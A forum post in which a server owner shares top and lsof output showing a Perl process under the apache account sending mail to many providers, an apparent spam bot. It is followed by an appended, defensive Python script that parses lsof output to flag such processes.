Full Discussion: Malicious perl script
Post 302992317 by dadprpus on Thursday 23rd of February 2017 04:32:34 PM
Here is what support sent me. I'm supposed to do this myself. Yes, someone else got into the terminal, because when I remotely logged in I saw this last login: the feb 23 14:59:13 2017 from phrank.aus.us.siteprotect.com
and then this happened:
Code:
top - 13:06:42 up 3 days, 16:16, 1 user, load average: 4.28, 7.87, 9.43
Tasks: 212 total, 2 running, 210 sleeping, 0 stopped, 0 zombie
Cpu(s): 15.6%us, 2.5%sy, 2.7%ni, 18.6%id, 60.0%wa, 0.0%hi, 0.7%si, 0.0%st
Mem: 1928704k total, 1875564k used, 53140k free, 17392k buffers
Swap: 4128764k total, 2257872k used, 1870892k free, 131640k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
4600 apache 20 0 2898m 1.3g 832 D 0.7 70.5 216:41.32 perl
11541 mysql 30 10 793m 50m 4516 S 0.7 2.7 25:14.14 mysqld
764 petra195 30 10 130m 37m 29m S 2.3 2.0 0:01.20 php-cgi
606 petra195 30 10 130m 37m 29m S 0.0 2.0 0:01.08 php-cgi
425 root 20 0 80596 26m 15m S 0.0 1.4 0:00.51 sw-engine
32159 psaadm 30 10 178m 10m 7432 S 0.0 0.6 0:02.80 sw-engine-fpm
12538 tomcat 20 0 647m 10m 712 S 0.0 0.6 2:38.43 java
710 psaadm 30 10 175m 7428 5132 S 0.0 0.4 0:00.04 sw-engine-fpm
3986 root 20 0 86160 6452 1820 S 0.0 0.3 0:18.78 sw-engine
18798 root 30 10 219m 5568 1532 S 1.0 0.3 20:20.56 fail2ban-server
4552 apache 20 0 9108 4540 988 R 16.5 0.2 201:07.83 perl
31173 apache 30 10 49924 4340 2712 S 0.0 0.2 0:00.19 httpd
4334 apache 20 0 11224 4128 1000 S 9.9 0.2 330:41.40 rnd
31111 apache 30 10 49792 4060 2504 S 0.0 0.2 0:00.08 httpd
4599 apache 20 0 8252 4052 988 S 4.6 0.2 211:32.19 perl
709 root 20 0 12604 3696 2872 S 0.0 0.2 0:00.05 sshd
31050 apache 30 10 50880 3688 2164 S 0.0 0.2 0:01.51 httpd
8391 apache 30 10 55936 3636 2304 S 0.0 0.2 0:11.95 httpd

[root@dedicated ~]# lsof | grep 4600
perl 4600 apache cwd DIR 253,3 4096 2 /
perl 4600 apache rtd DIR 253,3 4096 2 /
perl 4600 apache txt REG 253,3 5392 2364698 /usr/bin/perl
perl 4600 apache mem REG 253,3 17896 2765063 /lib/libdl-2.12.so
perl 4600 apache mem REG 253,3 200092 2765065 /lib/libm-2.12.so
perl 4600 apache mem REG 253,3 131260 2763674 /lib/libpthread-2.12.so
perl 4600 apache mem REG 253,3 1908112 2758628 /lib/libc-2.12.so
perl 4600 apache mem REG 253,3 19864 2626224 /usr/lib/perl5/auto/Socket/Socket.so
perl 4600 apache mem REG 253,3 145272 2755460 /lib/ld-2.12.so
perl 4600 apache mem REG 253,3 38380 2765062 /lib/libcrypt-2.12.so
perl 4600 apache mem REG 253,3 11368 2625445 /usr/lib/perl5/auto/Fcntl/Fcntl.so
perl 4600 apache mem REG 253,3 1461680 2491814 /usr/lib/perl5/CORE/libperl.so
perl 4600 apache mem REG 253,3 103388 2765077 /lib/libresolv-2.12.so
perl 4600 apache mem REG 253,3 105160 2626816 /usr/lib/perl5/auto/POSIX/POSIX.so
perl 4600 apache mem REG 253,3 12792 2765083 /lib/libutil-2.12.so
perl 4600 apache mem REG 253,3 9604 2764968 /lib/libfreebl3.so
perl 4600 apache mem REG 253,3 113912 2765067 /lib/libnsl-2.12.so
perl 4600 apache mem REG 253,3 16484 2625464 /usr/lib/perl5/auto/IO/IO.so
perl 4600 apache mem REG 253,3 18828 2628558 /usr/lib/perl5/auto/File/Glob/Glob.so
perl 4600 apache 0r CHR 1,3 0t0 3975 /dev/null
perl 4600 apache 1w CHR 1,3 0t0 3975 /dev/null
perl 4600 apache 2w CHR 1,3 0t0 3975 /dev/null
perl 4600 apache 3u IPv4 22086043 0t0 UDP *:40988
perl 4600 apache 4u IPv4 22086040 0t0 UDP *:59998
perl 4600 apache 5u IPv4 22086014 0t0 TCP dedicated.soloservices.net:59216->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 6u IPv4 22086050 0t0 TCP dedicated.soloservices.net:55756->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 7u IPv4 22086018 0t0 TCP dedicated.soloservices.net:59220->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 8u IPv4 22086048 0t0 TCP dedicated.soloservices.net:55752->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 9u IPv4 22086019 0t0 TCP dedicated.soloservices.net:59222->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 10u IPv4 22085763 0t0 UDP *:33352
perl 4600 apache 11u sock 0,6 0t0 22084878 can't identify protocol
perl 4600 apache 12u sock 0,6 0t0 22085460 can't identify protocol
perl 4600 apache 13u IPv4 22086021 0t0 TCP dedicated.soloservices.net:40530->imta-po.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 14u IPv4 22086015 0t0 TCP dedicated.soloservices.net:59218->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 15u IPv4 22086020 0t0 TCP dedicated.soloservices.net:59224->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 16u IPv4 22086022 0t0 TCP dedicated.soloservices.net:40532->imta-po.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 17u IPv4 22086023 0t0 TCP dedicated.soloservices.net:40534->imta-po.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 18u IPv4 22086024 0t0 TCP dedicated.soloservices.net:40536->imta-po.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 19u IPv4 22086046 0t0 UDP *:60891
perl 4600 apache 20u IPv4 22085979 0t0 TCP dedicated.soloservices.net:48622->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT)
perl 4600 apache 21u sock 0,6 0t0 22084905 can't identify protocol
perl 4600 apache 22u IPv4 22086049 0t0 TCP dedicated.soloservices.net:55754->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 23u sock 0,6 0t0 22084902 can't identify protocol
perl 4600 apache 24u IPv4 22086047 0t0 UDP *:35954
perl 4600 apache 25u IPv4 22086051 0t0 TCP dedicated.soloservices.net:55758->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 26u IPv4 22086044 0t0 UDP *:46542
perl 4600 apache 27u IPv4 22086053 0t0 TCP dedicated.soloservices.net:55762->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 28u IPv4 22086052 0t0 TCP dedicated.soloservices.net:55760->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 29u IPv4 22086054 0t0 TCP dedicated.soloservices.net:55764->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 30u IPv4 22086055 0t0 TCP dedicated.soloservices.net:55766->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 31u sock 0,6 0t0 22085418 can't identify protocol
perl 4600 apache 32u IPv4 22085770 0t0 TCP dedicated.soloservices.net:52386->mta-v1.mail.vip.bf1.yahoo.com:smtp (CLOSE_WAIT)
perl 4600 apache 33u IPv4 22086056 0t0 UDP *:44916
perl 4600 apache 35u IPv4 22085769 0t0 TCP dedicated.soloservices.net:52384->mta-v1.mail.vip.bf1.yahoo.com:smtp (CLOSE_WAIT)
perl 4600 apache 38u sock 0,6 0t0 22085416 can't identify protocol
perl 4600 apache 39u sock 0,6 0t0 22085420 can't identify protocol
perl 4600 apache 40u sock 0,6 0t0 22085434 can't identify protocol
perl 4600 apache 44u sock 0,6 0t0 22085436 can't identify protocol
perl 4600 apache 50u IPv4 22085448 0t0 TCP dedicated.soloservices.net:36992->mx1.hotmail.com:smtp (CLOSE_WAIT)
perl 4600 apache 51r FIFO 0,8 0t0 923850 pipe
perl 4600 apache 52w FIFO 0,8 0t0 923850 pipe
perl 4600 apache 53r FIFO 0,8 0t0 923851 pipe
perl 4600 apache 54w FIFO 0,8 0t0 923851 pipe
perl 4600 apache 55w REG 253,3 4251 1337727 /var/log/httpd/mod_jk.log
perl 4600 apache 56u REG 253,3 1024 1313820 /var/log/httpd/jk-runtime-status.12866 (deleted)
perl 4600 apache 57u REG 253,3 1 1313883 /var/log/httpd/jk-runtime-status.12866.lock (deleted)
perl 4600 apache 63u IPv4 22085832 0t0 TCP dedicated.soloservices.net:48376->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT)
perl 4600 apache 64u IPv4 22085888 0t0 TCP dedicated.soloservices.net:48472->mta-v4.mail.vip.ne1.yahoo.com:smtp (CLOSE_WAIT)
perl 4600 apache 108u IPv4 22085227 0t0 UDP *:56279
qmail-rsp 21406 qmailr txt REG 253,3 14600 1468991 /var/qmail/bin/qmail-rspawn

Moderator's Comments:
Please use CODE tags when displaying sample input, sample output, and code segments (as required by forum rules).


---------- Post updated at 04:32 PM ---------- Previous update was at 04:21 PM ----------

Also checked every instance of perl in the users' cgi-bin folders as well as the html folders. None found.

Last edited by Don Cragun; 02-23-2017 at 05:27 PM.. Reason: Add CODE and ICODE tags.
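As an added example (not code from the poster or from anyone in this thread), here is a small Python triage script that parses lsof rows in the layout shown above and flags processes running under a web-server account that hold several outbound SMTP sockets, which is exactly the pattern PID 4600 shows. The sample rows are copied from the output above plus one made-up benign sshd row; the set of web-server account names and the threshold of three SMTP sockets are assumptions.

```python
import re

# Constructed sample in the layout of `lsof` output (header included). The perl
# rows are copied from the lsof output in the post; the sshd row is made up.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
perl 4600 apache cwd DIR 253,3 4096 2 /
perl 4600 apache 5u IPv4 22086014 0t0 TCP dedicated.soloservices.net:59216->imta-ch2.sys.comcast.net:smtp (CLOSE_WAIT)
perl 4600 apache 6u IPv4 22086050 0t0 TCP dedicated.soloservices.net:55756->mtain-a-atc-b.mx.aol.com:smtp (CLOSE_WAIT)
perl 4600 apache 11u sock 0,6 0t0 22084878 can't identify protocol
perl 4600 apache 56u REG 253,3 1024 1313820 /var/log/httpd/jk-runtime-status.12866 (deleted)
perl 4600 apache 50u IPv4 22085448 0t0 TCP dedicated.soloservices.net:36992->mx1.hotmail.com:smtp (CLOSE_WAIT)
sshd 709 root 3u IPv4 12345 0t0 TCP *:ssh (LISTEN)
"""

# Remote side of a TCP NAME field: "local:port->remote:port (STATE)".
REMOTE_RE = re.compile(r"->(?P<host>[^:\s]+):(?P<port>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?$")
WEB_ACCOUNTS = {"apache", "www-data", "nobody", "httpd"}  # assumed account names

def parse_lsof(text):
    # NAME is the 9th column and may itself contain spaces, so split at most 8 times.
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or parts[0] == "COMMAND":
            continue
        yield {"cmd": parts[0], "pid": int(parts[1]), "user": parts[2],
               "fd": parts[3], "type": parts[4], "node": parts[7], "name": parts[8]}

def summarize(text):
    # Per-PID counters a responder cares about when triaging a suspected spam bot.
    stats = {}
    for row in parse_lsof(text):
        s = stats.setdefault(row["pid"], {"cmd": row["cmd"], "user": row["user"],
                             "smtp": 0, "close_wait": 0, "deleted": 0,
                             "unknown_sock": 0, "cwd_root": False})
        if row["fd"] == "cwd":
            s["cwd_root"] = row["name"] == "/"        # no working dir is itself odd for a CGI
        if row["node"] == "TCP":
            m = REMOTE_RE.search(row["name"])
            if m and m.group("port") in ("smtp", "25"):
                s["smtp"] += 1
                if m.group("state") == "CLOSE_WAIT":  # remote MTA already hung up
                    s["close_wait"] += 1
        if row["name"].endswith("(deleted)"):
            s["deleted"] += 1
        if row["type"] == "sock" and row["name"].startswith("can't identify"):
            s["unknown_sock"] += 1
    return stats

def suspicious_pids(text, smtp_threshold=3):
    # Web-server-account processes holding several outbound SMTP sockets.
    return sorted(pid for pid, s in summarize(text).items()
                  if s["user"] in WEB_ACCOUNTS and s["smtp"] >= smtp_threshold)
```

On a live host, feed it the output of `lsof -n -P` (numeric ports, so the port test sees `25`) and treat a flagged PID as a lead for checking the web application's writable directories and the mail queue, not as proof by itself.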